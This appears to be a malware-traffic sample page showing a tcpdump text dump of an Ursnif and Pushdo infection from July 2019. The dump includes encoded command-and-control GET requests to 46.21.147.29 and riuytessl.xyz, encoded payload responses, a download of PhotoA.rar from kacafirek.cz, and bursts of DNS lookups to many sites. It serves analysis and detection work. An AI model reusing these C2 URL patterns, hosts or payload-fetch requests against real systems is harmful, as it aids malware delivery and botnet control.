Text Example

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

Download Attachments

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
..e……..r.Z.P………..]…Y..]?#Ny.8…..-…. i………!a.. .BAB…..i.PQ.?Qa&..K….’.6z…………………………………i0..e0..M……..y@.TCg.,..Xc.oo
.0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…190719142342Z..191017142342Z0.1.0…U….riuytessl.xyz0..”0.. .H………….0.. ……….(C.9.U.k…..j.C.U.6..|a….k…M.. …...”q….O..q..V.g4.k.i….:?….(……………….+G..I.u..]k..3…..<….au..].L’xLh…..#9q.r.k……?.fCib..4[}P……p……Y.U..y.:..i……p..Zt5s}. .z]A@azl.t..D..X….dVU..Rcp.o.l!..^,.1.1…q…….Mn.. ..Vl..5…….U0S’.y?…….>hr…7…..=.. .k!TS_n.UE#N……F.dvi…ws….Q….#\PT.06…..+1.Y.g.?W.o-…#%,[..U….P.7….DMe…….|e.Z..-0….F9H….j./…Zj.]… VJ…~.ayy..Ny;h.u.i.’.{U3$c…………&.5c|……6……9. …..X.)py.………….u0..q0…U………..0…U.%..0…+………+…….0…U…….0.0…U……:.$’.UF.W.x.*.h&….0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0+..U…$0″..riuytessl.xyz..www.riuytessl.xyz0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..l ..c…..G0E.!…..T..X.LB……..~Z.…V….. .+/.|Ri.e….5.…vO..w../.]….v.) 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460
E…………..q
..e…….xr.Z.P…….r……EG.x…l
..>…..G0E.!…..lh…..F…P…….w..<.l0… T<..y..T.2Q +..Q.p…3_>.#%.z!.E0.. *.H………….Q.>=-J..’p.!.7W……X..q.WTx…..i8<...kc6…….D.O…….3…>…i.RRx.5<.….]../..1.T..A f..&..4.Q…:.6j.NR…./x.9….J…5Me..V}h..e….=.G….{………d.O….3E.?.VG..e0……1…..$…?.bp..Gw…h..).., mZ3…….!;.X…Q/..d…y…|…f….o…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..
………Z..G.r]7..hc0..5&.%…5.p./..KA….5.X...h….u….bq.y........xgq.i........B…tg…..Ra..?e…….V…..?…….k…}.+.e…6u.k.J…Ix/..O* %)..t..1..18….3.C….0..y1.=-6….3j.91……d.3…)…..}……….}0..y0…U…….0…….0…U………..0…+……..s0q02..+…..0..&http://isrg.trustid.ocsp.identrust.com0;..+…..0../http://apps.identrust.com/roots/dstrootcax3.p7c0…U.#..0…….{,q…K.u…`…0T..U. .M0K0…g…..0?..+……….000…+……..”http://cps.root-x1.letsencrypt.org0<..U…50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0…U…….Jjc.}….9..Ee…..0.. .H…………..3…cX8…. U.vV.pH.iG'{.$…Z.J.)7$tQ.bh…pg….N(Q………Z……j.j.>W#….b…….?. H….eb..T… ………2…w..ye.+.(.:.R..R.._….3.wl.@.2…\A.tl[]

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
07rwzN1wxvCWd3rBZRqevWWzLIsTvybdCsmwzeaaULAyy2Vy5oxxe1cX92MOCxC3ZQTo+1KHvKoqvNbCRp1xBSQZTNLReURGb8kNYH3+8JtR8xL9OmBF7Sm/4WIsuKzpacR1VqJIEIpbeNx3KLC8sqndJlMp07IoHValNX47uHFm2hY9H28QPgnMGW+y9HkcEMwdFh+E3yHoii4dzyrQnnpFFowy7pEoy1GQO5EW5bz2uxuUSAK3qJyHs5kVuNTpQP0qKUc9EjlEPFRjKCajoaxKEWSPD+f/45g1i9cS2dIGrp3t/IgmKbTYOLte8un43nqCF4gLuN5SV0ONquYbjiqVdU38jEYkwcxmgWnXlKoLGw3rSLlac1VA8oYQ7d/5KgBKPbCf6gJ+dyTcqSPQ9Spaiz5Dq69spM35RwwgGB2rGBAncEha02GnOidGumIJx+If+d0NJyTd51Q2dFLqGzg5WiQGQo+udLo7vaI/KUvvObs+1io0BRFa2X+rAbzGx6sLk4fI9ts/9IemiGl+szT83n4mExS1zP5QI8in/b0Qy79VKc1R3mYvm/J0GM6HJem8IJFH5BJqjrCOMerjG1hg6QSXk5AVOTIGezTaUMGVY5o+JvaDRxcOv/zhRKIx5qpeTYd+u2gExUdiOOMj7hqHAWn1DS0KiUJ7cjvniv+0En98QSv3wbZOO8ksFLa5new6152uNXX5lC2lAk/NgwHOWmt7cN074ASQ0GTAcoGsGRDL1WLTcZ7SNu8SUGIIo55/M7y7Ag4ITRqB95grEqHAtCNhliKrOEy1bn4GpZ9NG2Do2W
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..+QWA0tM0QdVuPkhswOFzlmPHTuY9CN2QDsWi1bIKzwR6vkhZ7KAwMVY1i48tC164mEm0z0RZNf+IrD3TPDZU5mRtCAqPy/I1zqVQaeBPpHhJwl+YI20OIHCOPQg94BqaoFvWP6ArUig5deAw5awc0Xts9xFKYpUGKmEC0nGwqHQP3UBzpcIvlrSTYLwh3/MtpScYFthdHNb/bld1mXgaGAZ5E6m0Tj4yVcrZSvFi+CNIrIsNhK9RIVbl9Ij3MeRiXBLXoabyasQ+tPADbSrKe+QgVog2pEtsi1XzNXvd0OFjkLfmduBJm/3GQZsjUczuEUF2vCPq0v6vzqqAuDGs1fwCcqe9j1vnzH8Msf+ElPuMloNmSBkdUloQMDJbKbskU5D00aW/DAh/MyzVoh496ITtuywkrC1hFf6bLRucFXSqL/IWjxK8n+LsEsoKxCYnd5MjlPnN7B6FrQg4BS6A4V9BLg8wDOp1hY/aNO/gSnnzcxoBWru+QrXQ+8iWoqv90qyEg9XNo/FwGHle7/3Uo1ES0lffJYr0lINt59NvSSNUaTgHItVymhKNOhPehcLPhHeHYI/g+/AIBpc92VIQLHzF3qe3kOLfQnUe8+AgI4sPKcpgPrNTdJ8alc/OTYDrcPLoLIS9cR5MH1kLuTZFgnFRFbwVnSZBn9Kd9LyUWjwWxH8wNJ3FYwyEMFszvvuucEqgTz8j2THI82rKE42DFtRG3uoH3FbToEnYVfUhBYe/NLyjgeMR38DVP3D4NxGcK64otXkReWSRU8YB7yUD7Y1jokacBnOPhnCdB5C3XJNcsPukxmHpCSg2pO3XOBxe2i+3iTUIIOGZtyhFKE5fkXcDmF0kS4vKakFkWC3TOYKT1kfidos6AU49cBx2OCIi+4KymAGygCmX5LiUbjZDT53qE12p7nFFPQou5/OwCHqUZLxw2zKOuCaSWzDfnfulRNe+V0ZjDCun794hdPLUXbX4SSTcaXcjwDSL+NFKFQ1L+eAaSGc9xlY+8LxzstSs7BWSMtPm3fGbKfEClnSLZOK2jhDJNgqbx9Bfil/6pkI3SoIL5g76ezoHhJUoDSzk70NJdSXoDMnXcP/FOjQzTGgHmDLIH1lpcBlC9baxvXK8a8N2ip33O+1iSyjBZ6hTLPdVTbmk9Xg0pz7Q5dhJ4IBEPQ9eo+xlm+CHI9ZAYQ7h01Kzvialrsfe+8ilK+aNZ6PDpN74yqn8CnsS5xazdBEKG7n2jXPRl+FOxsGVE0luECxROi/K/rHf76pNTsS+6N67jydO+HMvrpXAXvPHZQkQ9lkdjwPqbEubmReoPl4AyE7ksSS1ZOgnqsv6zgQePZkSCuIbN6MWfnMg5h1IjaV4IWTKwhZDUCgaqBRrPtEepmhL3fQ5TlAsF+6xbGFzx3nsAUlOB/k5IdzxeHF6aHRJcVqdcaNOujgaeawDPsEqAGmr4/w3
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..00maCBUypMWFQxMSDyrILJZUIfW1V6PnFnBZZGFQBlwGrD0w8eyrfi5KVKY/UYmAlg9Ob6AQz9sL9fOgrac2mScpFFDqx8B6tWHUfO5DZ3gKXe+Hq+WMsUMbuFbH4dlYsezuo0hnHniNRpAAuCxYEyn19E7xebnKJBp16rwB3LbP2OhwpoEhPtVNVYc+eFMNA9JBQ1mk9F/Lkbookgz2Q5ZQOmpbnpqagQWQloutSYu5u5NM+HTtNVZAns1V6xGnexCjeeTeI748NKWmdvW8wuHAMBdvJzNzLdaCLfmbCbkT7YnLcpkMHxRSp/pwaA/k0SIcUvKAR+4uKFKgKK2V1yQVlULPL55w+qR1YZj7s/vRsDHK9iqGXDRjwRauMqEj6aJabMYH8tcGz92o0DU+XaiHN1THg8hXQnsIVFcdrvdy3DgrSYwaX6SB6wj16vyc6uAbaOwY58TZNe7jRSyrxIHd+TnVGYbX0B7t9tM315IQ/8UVYHVJ7OTc5J06epbpzHZsY5VlXVrhvbp/LnCEWQCUSMVKI/v9fHljQO4z0w9PDWrrxsVetWxcDVSvPamcxg+hkx+wGmV3SmQg8EegO8qKFpfap/hgCJd4EuBFdfkKDWd7iqsWch1bcFAO2Kk5wnnqoivftNH6vLKYMtYGquVpeZDRzbxaa3et1XwiDEy6wGSBHvPARqq7sTo4HRjDYf1slg2PW0HsNnzDNaV7lPOPyBJi8W6dyvK/qKDnMa7yDE/CInmaHNIFErWXF3YG2y2w8LgTmcShVD9C/4eC4NRjFkRAmIO2pRFdIw1la1hvbPz9SGW80OMT16T70/nw4o5NT45C7bnPgl6Li7TXnvCLEcZPo38aoPzngVX5mGpLxWQO65W8Nn63qwJFMvOHfPL4UXxSDrs/od9I1griPceSIbBwDxWykgRRa3RmM7oA3nqlSFp0AMLWlT50DgcQILDGkuoAmcOk2mFPDbUuY70VUEcURbbEwt7ZRbCzgD1GzDQdHYL2dwswXxmp22xWLUYRHJE0U9O7CAqS/H69b3KaJ7vBI/B7TSXGJ3XZ9gs9A2VSCIt7hCl4qZNCWOcZsKYk0yeSKeAtdYH7vSQ8PoT+50/bK1Q39aNZhGAo2Ft6hdDynix9t+ugIRtiV2D9u9wi0xC7qVr5URmqheErnLxKlZ0ZmxDfJhM036/ixoeK8JwkYcGDvFMI7v5zNZIl/ijUTPU9pKbJ//gdj/Ml6KAKxIpWVaweUPFpPTagfK9NmquFzscCEKcHYcEXhxXsJLxrz8wNydnL1teY75mIrPG0ZnjLif012sgqpPyzNcRlb/+zEKdS7VGxk7WpkPBa8Xrk21vWJn59siPGMeIhJgPMEsrtUdiffXT5JYSOFar5mo/7dFPmXjhq5JIwE5kwBj81lKckcHi/GwMjwkfgSjT1Vkil+jGVD5jXoPzYf+OTNLHtpHrv

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/4
2A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

iDQg1v7keVA4gr+mxyf3wTWxsEYT5FWxPBpHhrh16rHRe9Iip2KPkI9GRO0eYWaezOnTs1o7Ln5PrFQZBtSBel/lGZtP9VH80RM3P38c12eUEsKvwdKkE/3VZ6an6nVoZZ3T19GKf9DttVcerLiQv5tBKRKV+iZjg24EesCMirABxLQ+wTJzpN8kfTBrQMDWvypvRaxTAhqhcZaRq26/freNXboiT+ZAPNy+sPgowSK
6BtAP1WduOiF712W9t6Cdk80L4PL+xleVk1BDVlVW7g4dnuI4E1WE2kn+/CMJ/Kf2AG5RctwNGk4BkH9jYf24NjVynFk385fvuOrZ9se2yaY3xh147eK5mxumEXWfJ/0yvBDv7CpZHU+YEdzqIIikvPq7U6hdihZC7CfSQjmdJ9qU1nHfrMK6yTkXmjyR0grJshmTZN3KYgY81qMQXIvHvAcT6GU2KzmaBIeIA293m4
gC0mKNB1ck1l9DowLnu/g7NCcXZIKBCSDjlEDzrEV5T/YpqsoLvdMrpKUruqu54aW20bFCxejhrqtPia357tA2MFdl3xVm4XNq5+RIwOW2ELoenaXIm1FZuEuxJyadbyvcqofZX1jXhsg7G/74q0fxC8fkz2veauD9rOwlieO9M/bw5gH8DDS8NTummTzX+xU9QPfCEh2nYJL7/S0d6eOadYY5ik2ALj7pU4rEWCPPS
umt190uprB6A9c3udOXgoPejyeuCLQKUB9UxhMgxdsGOoVJPDdSfoqGHlT8a9UGrg6F0rCFAVBDxo0TXC+SaKu78hipFnneaVTHYxi/tLw088dQkzc1PmtnNOFqUXWBirxiBWw2rsGD6wOdO/YjSm8Mdo8AEfd6B39F0rFo78boD/zyLaRm+2g7bE2s7QWyvA9q3NKNW+nFLz
2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z… 2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: “e60124-3eea3-58ecd5e2cfdc0”
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com….. 2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33) E..=……Z. ..e…….5.)..O…………www.pr-park.com….. 2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32) E..<./….Z. ..e…….5.(..o@………..www.2print.com….. 2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31) E..;.1….Z. ..e…….5.’.k………….www.crcsi.org….. 2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33) E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com….. 2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33) E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca….. 2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31) E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com….. 2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30) E..:.5….Z. ..e…….5.&…0………..www.c9dd.com….. 2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33) E..=.6….Y. ..e…….5.))…………..www.udesign.biz….. 2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34) E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... ................. 2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65) E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@ 2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.9@....u ..e.i.@.a.P.......... ................. 2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204) E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y 2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… …………….. 2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a....... 2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0 E..(.>@....
..eh..V.b.P…&D;”.P…y…
